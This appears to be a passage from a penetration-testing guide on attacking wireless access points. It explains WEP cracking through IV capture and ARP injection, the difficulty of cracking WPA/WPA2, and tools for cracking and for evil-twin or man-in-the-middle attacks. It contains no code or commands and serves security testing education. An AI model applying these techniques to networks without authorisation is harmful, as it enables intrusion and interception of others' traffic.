A wireless access point (WAP) enables wireless devices to connect to a local network, typically using the Wi-Fi protocol. Because a WAP is an entry point into a network, and transmits data over the air to other devices, it is a worthwhile target to dedicate resources to for testing.
A WAP's susceptibility to compromise usually depends on the strength of its encryption scheme. WAPs using the obsolete Wired Equivalent Privacy (WEP) scheme are especially vulnerable to intrusion. WEP uses the RC4 stream cipher with a 24-bit initialization vector (IV)—a small enough size that can enable you to crack the password with minimal effort. In WEP cracking, you can start capturing traffic over the air and then dump the packets to a file. Because the IV is bound to repeat after a few thousand packets, you can extract it within a matter of minutes, enabling you to crack the password. You can also speed up the process by using a tool like aircrack-ng to inject traffic into the WAP, thereby speeding up the process of generating IVs. For example, you can spoof the MAC address of a client connected to the WAP and then inject ARP packets.
Most Wi-Fi networks today use WPA/WPA2 to mitigate against a vulnerability like this. Cracking a WPA/WPA2 password is therefore considerably more difficult. You can use typical dictionary-based and brute force methods to try to crack the password offline, assuming you managed to grab the hashes. However, the strength of encryption used in WPA/WPA2 might make this infeasible. Online attacks are also difficult to pull off if the WAP has a lockout function that activates after a certain number of failures.
There are a number of good tools you can use to attack wireless access points and their clients. Here are a few examples:
- The Aircrack-ng suite (airmon-ng, airodump-ng, aireplay-ng, aircrack-ng, and many others)—a complete set of tools for wireless monitoring, attacking, testing, and cracking
- Kismet—a wireless sniffer, network detector, and intrusion detection system
- Wifite—a customizable tool you can use to attack WEP, WPA, and WPS
- WiFi-Pumpkin—create an evil twin/conduct a man-in-the-middle attack
- WiFi Pineapple—simplifies wireless man-in-the-middle attacks